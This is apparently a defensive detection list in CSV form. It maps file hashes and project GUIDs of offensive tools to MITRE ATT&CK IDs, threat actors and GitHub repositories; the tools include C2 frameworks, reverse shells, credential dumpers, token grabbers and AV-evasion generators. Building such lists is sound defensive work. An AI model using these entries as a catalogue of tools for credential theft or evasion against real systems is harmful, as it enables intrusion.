"*E2596512-8A36-4D48-8AA1-9791E48A16CC*",".{0,1000}E2596512\-8A36\-4D48\-8AA1\-9791E48A16CC.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#GUIDProject","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","41896"
"*e26ad15ce8889faf79eecbb5b8395b28df02ea622996199e7e4384635b55b14f*",".{0,1000}e26ad15ce8889faf79eecbb5b8395b28df02ea622996199e7e4384635b55b14f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","41898"
"*e273485e4f1382b7848b6c263cf0ce9e37aa783e9e781630aaa50daffea5aeb2*",".{0,1000}e273485e4f1382b7848b6c263cf0ce9e37aa783e9e781630aaa50daffea5aeb2.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","41899"
"*e273cf78ec19c5e3051a98721131c2b94d7a3bdadc5e3269ccb7b72e230ee643*",".{0,1000}e273cf78ec19c5e3051a98721131c2b94d7a3bdadc5e3269ccb7b72e230ee643.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","41900"
"*e277468009b97989146089c83231fa03247555b6cc2979b68d549a0d0e8ea0e1*",".{0,1000}e277468009b97989146089c83231fa03247555b6cc2979b68d549a0d0e8ea0e1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","#filehash","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","41902"
"*E2778331DA361353B5A445FBD4488418BD25F19FBB931AB39FD9E005137153E8*",".{0,1000}E2778331DA361353B5A445FBD4488418BD25F19FBB931AB39FD9E005137153E8.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","41903"
"*e279a6912143a62d5f1a036f60a97e3c8db8609bbaf4aa56d5a85c9adf3571ca*",".{0,1000}e279a6912143a62d5f1a036f60a97e3c8db8609bbaf4aa56d5a85c9adf3571ca.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","41904"
"*e279bdfd5c0a7c8782255f9c144d85635054f9b26db4909669d80ff1cd853893*",".{0,1000}e279bdfd5c0a7c8782255f9c144d85635054f9b26db4909669d80ff1cd853893.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41905"
"*e27bbd5323fd6e3c1fcd501bf9279dd83fa211892c10ebf552773f4f5c89e4ab*",".{0,1000}e27bbd5323fd6e3c1fcd501bf9279dd83fa211892c10ebf552773f4f5c89e4ab.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","0","#filehash","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","41907"
"*e27f5050d889525c51431074c81403d6917f081af8694a978e92a975a5b67472*",".{0,1000}e27f5050d889525c51431074c81403d6917f081af8694a978e92a975a5b67472.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","41908"
"*e281c4aeeb508f9ec7abdaedde54203747ef31b02b97aa21ea7a2c4c06659f11*",".{0,1000}e281c4aeeb508f9ec7abdaedde54203747ef31b02b97aa21ea7a2c4c06659f11.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","41910"
"*e290d98bd79a5f643d384efdf56a7c6c383c12efd3c810bf4513dda266cd7935*",".{0,1000}e290d98bd79a5f643d384efdf56a7c6c383c12efd3c810bf4513dda266cd7935.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#filehash","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","41911"
"*e292dfd2c82421324fdc94d544472f78528bdd862148509cab29ecdcbf9d8c4c*",".{0,1000}e292dfd2c82421324fdc94d544472f78528bdd862148509cab29ecdcbf9d8c4c.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","#filehash","N/A","10","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41912"
"*e2940f2785f9f9b38e5cac80100a401145f558602a7af45475760884aeba44f9*",".{0,1000}e2940f2785f9f9b38e5cac80100a401145f558602a7af45475760884aeba44f9.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","41913"
"*e294df6f9ef18160367aa9d540ca2c26dc1c17211289c7154d347308e0902af5*",".{0,1000}e294df6f9ef18160367aa9d540ca2c26dc1c17211289c7154d347308e0902af5.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","41914"
"*e2964ea4bc4e439e55f46ed309904e9592145858076d65363a2bbbab0bd608cc*",".{0,1000}e2964ea4bc4e439e55f46ed309904e9592145858076d65363a2bbbab0bd608cc.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","41915"
"*e2a00647b5fa56b077d3d07b1c05e3b76b7269e07fc3ea84750eb03ad71024de*",".{0,1000}e2a00647b5fa56b077d3d07b1c05e3b76b7269e07fc3ea84750eb03ad71024de.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","41917"
"*e2a30fed2c42d6b7e9098b8d7dda2cecab3c404b4aaff289d58dea32003c31e6*",".{0,1000}e2a30fed2c42d6b7e9098b8d7dda2cecab3c404b4aaff289d58dea32003c31e6.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","41918"
"*e2bff960e45f419ca14338dcdefdcfe25378bc5efa56adfb762ebca92847d86f*",".{0,1000}e2bff960e45f419ca14338dcdefdcfe25378bc5efa56adfb762ebca92847d86f.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","41922"
"*e2c267e1e289e975e1a4a2acf13f30eb04dbb4a4da24daae02c248dbb199e919*",".{0,1000}e2c267e1e289e975e1a4a2acf13f30eb04dbb4a4da24daae02c248dbb199e919.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","41923"
"*e2c3b2d10ba4db5f13e05de8197818f8ce94da878b5eba6c82a7feb73340b538*",".{0,1000}e2c3b2d10ba4db5f13e05de8197818f8ce94da878b5eba6c82a7feb73340b538.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","#filehash","N/A","10","","N/A","","","","41924"
"*e2c4f99f6a5d7bd663caba698a5867963fa2917201dcad6e94de8ff4a3f6a256*",".{0,1000}e2c4f99f6a5d7bd663caba698a5867963fa2917201dcad6e94de8ff4a3f6a256.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","41925"
"*e2dce90e4211ea7dcd8e5721b9b9131484cf6974bb5d5a9c91e39c05710733df*",".{0,1000}e2dce90e4211ea7dcd8e5721b9b9131484cf6974bb5d5a9c91e39c05710733df.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","41928"
"*e2e2086796947124cf0dded1338a6c1d86da44ed72a7bb49248fd65e491d88c9*",".{0,1000}e2e2086796947124cf0dded1338a6c1d86da44ed72a7bb49248fd65e491d88c9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41930"
"*e2e3e51ea97a2c74d1b98618143d69acfcdbbabd0d33607cb475757e05fc6c4b*",".{0,1000}e2e3e51ea97a2c74d1b98618143d69acfcdbbabd0d33607cb475757e05fc6c4b.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","41931"
"*e2e4aa450b41227d2ba109c7f43de79ab16413cd2c249bb1c6793c0656b516e6*",".{0,1000}e2e4aa450b41227d2ba109c7f43de79ab16413cd2c249bb1c6793c0656b516e6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","41932"
"*e2e514386e255c21cdc78a920822cdf2fd8c9b858950d5d0e842edb2a96f3935*",".{0,1000}e2e514386e255c21cdc78a920822cdf2fd8c9b858950d5d0e842edb2a96f3935.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","41933"
"*E2E5C254A2E4BDC4926B6CAD49F0F0FE3933B436DE232C85C900C41A16888F55*",".{0,1000}E2E5C254A2E4BDC4926B6CAD49F0F0FE3933B436DE232C85C900C41A16888F55.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","41934"
"*E2E64E89-8ACE-4AA1-9340-8E987F5F142F*",".{0,1000}E2E64E89\-8ACE\-4AA1\-9340\-8E987F5F142F.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","0","#GUIDproject","N/A","10","7","624","90","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z","41935"
"*e2ea75cda1cbe2d628b20a93a49904f17d158866a644ff262d3c59731418c9a9*",".{0,1000}e2ea75cda1cbe2d628b20a93a49904f17d158866a644ff262d3c59731418c9a9.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","41936"
"*e2fc147f2ac14938a48eebc9292258af10edcc7ef057acd07ff2ae6729f1cb7a*",".{0,1000}e2fc147f2ac14938a48eebc9292258af10edcc7ef057acd07ff2ae6729f1cb7a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","41939"
"*E2FDD6CC-9886-456C-9021-EE2C47CF67B7*",".{0,1000}E2FDD6CC\-9886\-456C\-9021\-EE2C47CF67B7.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","Dispossessor","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","0","#GUIDproject","N/A","10","7","609","74","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z","41940"
"*e2fef0ec8523ec22594297061e813d69f48f47e33d99f2f96f63a0abc053aa51*",".{0,1000}e2fef0ec8523ec22594297061e813d69f48f47e33d99f2f96f63a0abc053aa51.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","41941"
"*E300339058A885475F5952FB4E9FAAA09BB6EAC26757443017B281C46B03108B*",".{0,1000}E300339058A885475F5952FB4E9FAAA09BB6EAC26757443017B281C46B03108B.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","41943"
"*e301dcccae011793013ea604a8e7cbd343595fa78d09f38b2776740a55a308c8*",".{0,1000}e301dcccae011793013ea604a8e7cbd343595fa78d09f38b2776740a55a308c8.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","41944"
"*e3038dfa23e4c4707e73f5b4a214fe35796b805ef213e0e84da1e20cd5643fa5*",".{0,1000}e3038dfa23e4c4707e73f5b4a214fe35796b805ef213e0e84da1e20cd5643fa5.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","#filehash","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","41945"
"*e30443b3f19aafa06b3edb124228f6ac35aa51737c3eb78fa007ffdce9d75bc5*",".{0,1000}e30443b3f19aafa06b3edb124228f6ac35aa51737c3eb78fa007ffdce9d75bc5.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","41946"
"*e30560b23a52a32b2ad8250466c1b0a975348ab4f6240e629288bc4ad74430fb*",".{0,1000}e30560b23a52a32b2ad8250466c1b0a975348ab4f6240e629288bc4ad74430fb.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","41947"
"*e30560b23a52a32b2ad8250466c1b0a975348ab4f6240e629288bc4ad74430fb*",".{0,1000}e30560b23a52a32b2ad8250466c1b0a975348ab4f6240e629288bc4ad74430fb.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","41948"
"*e30a09e1311d6fdcef61667429210285a5b84b84b9bf9d6aab7d35e5715e5df9*",".{0,1000}e30a09e1311d6fdcef61667429210285a5b84b84b9bf9d6aab7d35e5715e5df9.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","41950"
"*e30bad2f0453e4041755190c7a33df46a175f71baa5b24e53fcce67b4d85f270*",".{0,1000}e30bad2f0453e4041755190c7a33df46a175f71baa5b24e53fcce67b4d85f270.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41951"
"*E3104B33-DB3D-4C83-B393-1E05E1FF2B10*",".{0,1000}E3104B33\-DB3D\-4C83\-B393\-1E05E1FF2B10.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","41952"
"*e3126e7a17ffcf6e659b3b603134067a47769e74244032cb6e23a5532913291c*",".{0,1000}e3126e7a17ffcf6e659b3b603134067a47769e74244032cb6e23a5532913291c.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","41953"
"*e3130262a4adfed3a225075d6eb93c5caeeba93b1253dc1b148f8a80c5c35a03*",".{0,1000}e3130262a4adfed3a225075d6eb93c5caeeba93b1253dc1b148f8a80c5c35a03.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","41954"
"*e31b89233aff02e3c31f7b507c212809cf987636abe5c8d28ccb66dec9bc976d*",".{0,1000}e31b89233aff02e3c31f7b507c212809cf987636abe5c8d28ccb66dec9bc976d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","41956"
"*e32a0a69f8d98f79823aa087f883b16e04b4993090aedc0e29ca11b571e1bc4d*",".{0,1000}e32a0a69f8d98f79823aa087f883b16e04b4993090aedc0e29ca11b571e1bc4d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","41958"
"*e331b3ba5acf93a468035ddc6d2591c5291574d64a509b4d511218c3bfa00f12*",".{0,1000}e331b3ba5acf93a468035ddc6d2591c5291574d64a509b4d511218c3bfa00f12.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","41960"
"*e336612e451075ecb75b27bd473aa21aba4f0a98df3cef57ad303894cce4f34b*",".{0,1000}e336612e451075ecb75b27bd473aa21aba4f0a98df3cef57ad303894cce4f34b.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","#filehash","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","41961"
